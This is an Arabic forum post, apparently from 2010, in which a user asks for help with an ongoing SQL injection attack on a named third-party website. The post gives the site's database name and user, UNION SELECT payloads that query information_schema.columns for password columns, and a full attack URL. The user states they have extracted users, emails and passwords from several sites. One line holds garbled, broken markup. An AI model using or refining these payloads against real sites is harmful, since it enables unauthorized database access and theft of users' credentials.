السلام عليكم ورحمة الله وبركاته
كيفكم اخواني
اخواني في موقع مصاب ببثغرة SQL
سويت عليه الحقنه وكل شي تمام التمام
والاعمدة المصصصابـة [ 14 ]
وأصدار القاعــدة [ 5 ]
وإسم القاعـــدة [ stalpraa_website ]
وإسم يوزر القاعـدة [ stalpraa_stal@localhost]
والاعمـدة الي طلعت عشان استخدمها في الحقنه هي [ 2 و 7 ] ..
طيب انا الحين سويت كل هذي الاوامر
طيب حلــو
سويت الاوامر التاليه كما تعلمت ...
بعد الاعمدة اكتبها
+from+information_schema.columns
اكتبها في العمود المصاب .
Concat(table_name,0x3a,column_name,0x3a,table_sche ma)
وبعدين هذي الكمات ومع كلمه الباس مشفرة .
+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)
اوك الحين انا الى هنا وقفت مع العلم أني اعرف أكمل الحقنه ألى اليوزر والباسورد واعرف أسستخرج اليوزرات
والاميلات والباسوردات تبع الموقع كامل ،، [ انا جربت على اكثر من موقــع << يعني تعلمت للحقن ] .. 
############################################
طيب انا لما وصلت الى .
+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)
عشان استخرج اسم جدول الباسورد ..
وهذا الرابط للتأكــيــد ..
كود PHP:
http://www.stalpraas.com/eng/look.php?id=-2%20Union%20Select%201,Concat%28table_name,0x3a,column_name,0x3a,table_schema%29,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+column_name+LIKE+CHAR%2837,%20112,%2097,%20115,%2037%29--
طيب ممنكن اعرف ياشباب ايش المشكله ،، [ لان لما وصلت لهذه الحقنــه مايطلع معاي اسم جدول الباسورد ؟؟
ايش الحل يا أخوان ...
ومع العلم اني جربت ، نفس الطريقه على عمود 2 و 7
ونفس الشي مايطلع ، جدول الباسورد ؟؟
الي بعرف يعلمني واكون شاكرلــه .. :(
Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC afhf ll;k huvt hda sff i`h hgo'h uk]lh hsjov[ hgul,] jfu hgfhs,v]
02-01-2010, 04:12 PM
غير مجاب: شباب ممكن اعرف ايش سبب هذا الخطا عندما استخرج العمود تبع الباسورد 
العرض الشجري
المواضيع المتشابهه 
